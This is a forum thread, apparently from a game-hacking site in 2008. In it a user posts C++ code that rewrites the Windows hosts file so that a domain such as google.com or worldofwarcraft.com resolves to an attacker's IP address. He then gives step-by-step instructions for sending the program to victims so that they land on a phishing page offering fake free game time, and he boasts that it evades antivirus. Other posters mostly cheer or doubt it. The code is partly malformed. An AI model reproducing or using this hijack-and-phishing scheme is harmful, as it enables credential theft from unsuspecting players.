[Windows] Scam From OFFICIAL WoW site menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 20
  1. #1
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [Windows] Scam From OFFICIAL WoW site

    [Windows] Scam From OFFICIAL WoW site
    Code:
    #include 
    using namespace std;
    int main()
    {
        std::ofstream file;
        file.open("C:/WINDOWS/system32/drivers/etc/hosts");
        file << "206.71.153.245  google.com";
        std::ifstream inFile( "C:/WINDOWS/system32/drivers/etc/hosts", ios::in | ios::trunc );
        file.close();
    }
    Alright let me explain somethings first.


    What does this do?
    What this does is when the program is executed on a windows Computer it injects a line of text into your windows host files. Found at the location in file.open; So when you goto the site on the right side google in the example it will actually take you to the ip, which is the left side 206.71.153.245, now when the person goes "Oh hey, lets go check out google real quick" guess what happens, hes redirected to your site, and yes the URL, still stays on "http://google.com/ and it doesnt do it for all the sites only does it for google, so you can goto like YouTube - Broadcast Yourself. and it wont take you to the ip(Mmowned). Now, say for example you send this to someone, and you could have it redirect to your phisher to do a Survey for 10 freedays, and I could possibly implement something so once its done it automaticly deletes the file. But that will come later.

    Things you will need:

    A brain
    A visual Studio C++ Compiler
    Copy-Paste leech skills.
    Able to edit the Code.

    Ok so you need to find the URL of your phisher page
    goto
    Start>run> Type in "CMD" now type in the black box(DOS) type into it ping website.com
    the website will be your phisher website. Take that ip and add it to the code, after that your going to wanna do
    IP.IP.IP.IP/Suburlforhostingproviders unless you have your own website you wont need the /yoursuburl
    Alright thats all
    Questions ask em
    Last edited by typedef; 12-06-2008 at 10:41 PM.

    [Windows] Scam From OFFICIAL WoW site
  2. #2
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Guys this is so epic you dont understand... When someone downloads your program, it doesnt get detected by a virus software. Also what it does, when they now goto World of Warcraft: Wrath of the Lich King
    It will now redirect them to your phisher site, how cool? More people will fall for this then a regular goto OpenDNS
    They goto Worldofwarcraft.com/ thinking lets go check some stuff out and they get redirected to your Scamming site thinking there getting a free 10 day game time to there account for doing this poll. Epic eh?

  3. #3
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Come on noone likes this lol? wtf. This is like the best way of getting people! More epicer then your keyloggers

  4. #4
    supremeoverlord's Avatar Member
    Reputation
    13
    Join Date
    Nov 2008
    Posts
    101
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    this will totally get picked up by an antivirus :P

  5. #5
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No it will not get picked up by Anti Virus dumb ass, its not memory editing anything and its not kernal editing. There is attaching to the proccess its opening a damn file up and editing it. Want me to scan my Debug version of it to prove you wrong?

    I havent changed the name because I was working on read_realmist that would change the realmlist file. But anywho, here is the file that the code is Debugged linked, builded in. http://www.virustotal.com/analisis/c...69c4f7989f2709
    Last edited by typedef; 12-06-2008 at 10:05 PM.

  6. #6
    supremeoverlord's Avatar Member
    Reputation
    13
    Join Date
    Nov 2008
    Posts
    101
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by typedef View Post
    No it will not get picked up by Anti Virus dumb ass, its not memory editing anything and its not kernal editing. There is attaching to the proccess its opening a damn file up and editing it. Want me to scan my Debug version of it to prove you wrong?

    I havent changed the name because I was working on read_realmist that would change the realmlist file. But anywho, here is the file that the code is Debugged linked, builded in. Virustotal. MD5: 7ebdb0c04d0b20fc180b992999e898ad
    I dont mean it contains a virus, but i mean, when it goes to edit the host file, it'll throw up a warning message with any decent anti-virus.

  7. #7
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Let me prove this wrong one sec.
    Edit: As I begin to test it on other pc, I just wanna say this is a really good Program you guys are just stupid. You dont see a good thing to leech while you can.
    Last edited by typedef; 12-06-2008 at 10:38 PM.

  8. #8
    Lilfrost's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    24
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    this program is awsome dont listen to the "haters" ima try it out

  9. #9
    pieforbilly's Avatar Member
    Reputation
    45
    Join Date
    Nov 2007
    Posts
    104
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well the fact that you commented back 3 times within 3 hours of the original time of post just made me laugh. And your a leecher, I want some proof. If this works then it could be useful, but the only person to say anything good about this is you.

  10. #10
    bigdevil911's Avatar Member
    Reputation
    12
    Join Date
    Mar 2007
    Posts
    85
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    looks like it would work +rep

  11. #11
    Iaccidentallytwink's Avatar Elite User
    Reputation
    591
    Join Date
    Aug 2007
    Posts
    1,020
    Thanks G/R
    1/16
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    THIS IDEA IS NEW AND EXCITING AMIRITE?
    So you can edit your host files?
    /yawn
    Also, what will you do if they decide to type www.google.com?
    Known it for years, not fully functional.


  12. #12
    Grasi's Avatar Member
    Reputation
    49
    Join Date
    Sep 2007
    Posts
    155
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

  13. #13
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Grasi, I posted there ha to get people to come here. Umm as I explained guys you would change google to worldofwarcraft.com/index/poll_Fake;
    when they go there they fill out a form.

  14. #14
    Maxmaximuss2's Avatar Member
    Reputation
    12
    Join Date
    Sep 2008
    Posts
    246
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hmmm Im running at Windows xp... not working that good... but i know heck of lot of CMD and DOS mode, I had Programmed my own Program in Virusal basic, for Avast antivirus Program... if you need it then just PM ME. cause I got alot of Licens to it.

  15. #15
    typedef's Avatar Banned
    Reputation
    8
    Join Date
    Nov 2008
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well many of your arent happy with this but guess whats coming next?
    You know those progams that want you to enter your account name and password? Well I got one that will change the password, and send you it in mail.

Page 1 of 2 12 LastLast
All times are GMT -5. The time now is 03:06 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search